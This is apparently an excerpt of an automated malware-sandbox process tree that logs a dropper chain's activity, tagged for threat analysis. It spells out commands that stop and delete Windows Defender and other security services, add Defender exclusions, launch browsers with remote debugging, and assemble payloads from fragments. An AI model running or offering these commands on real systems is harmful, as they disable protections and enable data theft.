C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:4052
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:3148
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:3560
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:5260
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:4612
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:2956
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:4452
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:4428
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:2216
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:4812
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:4956
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:3656
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:3784
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:5876
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:3256
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:5572
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:1728
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:3208
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:6012
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:5676
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:896
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:4976
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:5000
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:5480
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:4984
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:2772
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:1844
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:2184
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:4384
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:5400
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:6024
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:1372
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:5288
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:2240
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:5844
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:1704
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:3640
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:456
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:1504
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:3472
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:5748
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:5536
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:4472
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:3616
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:1176
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:2448
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:5776
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:2360
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:3460
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:4468
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:1692
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1508 -
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5580 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6108 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1176 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8c5b0dcf8,0x7ff8c5b0dd04,0x7ff8c5b0dd108⤵PID:5872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2024,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2020 /prefetch:28⤵PID:2856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2264 /prefetch:38⤵PID:1944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2572 /prefetch:88⤵PID:2328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3268 /prefetch:18⤵
- Uses browser remote debugging
PID:1744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3316 /prefetch:18⤵
- Uses browser remote debugging
PID:684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4296,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4320 /prefetch:28⤵
- Uses browser remote debugging
PID:4640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4748,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4736 /prefetch:18⤵
- Uses browser remote debugging
PID:4748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5360,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5376 /prefetch:88⤵PID:5052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5364,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5452 /prefetch:88⤵PID:2956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5372,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5564 /prefetch:88⤵PID:4976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5572,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5548 /prefetch:88⤵PID:852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5376,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5488 /prefetch:88⤵PID:4828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4600,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5516 /prefetch:88⤵PID:5448
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2520 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7ff8c5aef208,0x7ff8c5aef214,0x7ff8c5aef2208⤵PID:5320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:38⤵PID:5800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2648,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:28⤵PID:5560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2180,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=2764 /prefetch:88⤵PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3596,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:18⤵
- Uses browser remote debugging
PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3604,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:18⤵
- Uses browser remote debugging
PID:380
-
-
-
C:\ProgramData\5xtr16xtri.exe"C:\ProgramData\5xtr16xtri.exe"7⤵PID:6152
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:6172
-
-
-
C:\ProgramData\h47ymoppph.exe"C:\ProgramData\h47ymoppph.exe"7⤵PID:6496
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:6620
-
C:\Users\Admin\AppData\Roaming\NBTNwioDyA.exe"C:\Users\Admin\AppData\Roaming\NBTNwioDyA.exe"9⤵PID:6704
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"10⤵PID:3772
-
-
-
C:\Users\Admin\AppData\Roaming\3LgWs99XJN.exe"C:\Users\Admin\AppData\Roaming\3LgWs99XJN.exe"9⤵PID:6784
-
-
-
-
C:\ProgramData\8y58gl689h.exe"C:\ProgramData\8y58gl689h.exe"7⤵PID:6608
-
C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exeC:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exe 08⤵PID:6584
-
C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\3kaiNMY0vTJaO8gw.exeC:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\3kaiNMY0vTJaO8gw.exe 65849⤵PID:1372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 100810⤵
- Program crash
PID:17020
-
-
-
C:\Users\Admin\AppData\Local\Temp\29g3RGhE\Wshieaw4ZXQNf5DY.exeC:\Users\Admin\AppData\Local\Temp\29g3RGhE\Wshieaw4ZXQNf5DY.exe 09⤵PID:6264
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"10⤵PID:5260
-
-
-
C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kr3KzjrL19f1UM2N.exeC:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kr3KzjrL19f1UM2N.exe 65849⤵PID:20384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 20384 -s 62810⤵
- Program crash
PID:24128
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\zua1n" & exit7⤵PID:1952
-
C:\Windows\SysWOW64\timeout.exetimeout /t 118⤵
- Delays execution with timeout.exe
PID:528
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5812 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3328
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"5⤵
- Executes dropped EXE
PID:3108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5968
-
-
C:\Users\Admin\AppData\Roaming\BExplorer\bot.exeC:\Users\Admin\AppData\Roaming\BExplorer\bot.exe6⤵
- Executes dropped EXE
PID:5680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5852 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:1028
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4136
-
-
-
C:\Users\Admin\AppData\Local\Temp\10046340101\427e1a688b.exe"C:\Users\Admin\AppData\Local\Temp\10046340101\427e1a688b.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4608 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat6⤵
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"7⤵
- System Location Discovery: System Language Discovery
PID:452
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"7⤵
- System Location Discovery: System Language Discovery
PID:4556
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6741877⤵
- System Location Discovery: System Language Discovery
PID:1368
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Funky.wbk7⤵
- System Location Discovery: System Language Discovery
PID:1552
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Und" Tournament7⤵
- System Location Discovery: System Language Discovery
PID:4604
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com7⤵
- System Location Discovery: System Language Discovery
PID:380
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r7⤵
- System Location Discovery: System Language Discovery
PID:2384
-
-
C:\Users\Admin\AppData\Local\Temp\674187\Constraints.comConstraints.com r7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1496
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵
- System Location Discovery: System Language Discovery
PID:5448
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4136 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1500
-
-
-
C:\Users\Admin\AppData\Local\Temp\10049500101\bfbdc8a175.exe"C:\Users\Admin\AppData\Local\Temp\10049500101\bfbdc8a175.exe"5⤵PID:2876
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10049500101\bfbdc8a175.exe"6⤵PID:6360
-
-
-
C:\Users\Admin\AppData\Local\Temp\10049510101\43facf6a37.exe"C:\Users\Admin\AppData\Local\Temp\10049510101\43facf6a37.exe"5⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10049510101\43facf6a37.exe"6⤵PID:12548
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427820101\25803510b2.exe"C:\Users\Admin\AppData\Local\Temp\10427820101\25803510b2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5228 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10427820101\25803510b2.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:868
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427830101\a9048da77e.exe"C:\Users\Admin\AppData\Local\Temp\10427830101\a9048da77e.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4184 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:740
-
-
-
C:\Users\Admin\AppData\Local\Temp\10427840101\40e05db4e7.exe"C:\Users\Admin\AppData\Local\Temp\10427840101\40e05db4e7.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:932
-
-
C:\Users\Admin\AppData\Local\Temp\10427850101\a3f39ef5ef.exe"C:\Users\Admin\AppData\Local\Temp\10427850101\a3f39ef5ef.exe"3⤵
- Executes dropped EXE
PID:2440
-
-
C:\Users\Admin\AppData\Local\Temp\10427860101\7a76898fa2.exe"C:\Users\Admin\AppData\Local\Temp\10427860101\7a76898fa2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3752
-
-
C:\Users\Admin\AppData\Local\Temp\10427870101\8c3b034fea.exe"C:\Users\Admin\AppData\Local\Temp\10427870101\8c3b034fea.exe"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:4716
-
-
C:\Users\Admin\AppData\Local\Temp\10427880101\36fe42cf07.exe"C:\Users\Admin\AppData\Local\Temp\10427880101\36fe42cf07.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5748 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4172
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1744
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3024
-
-
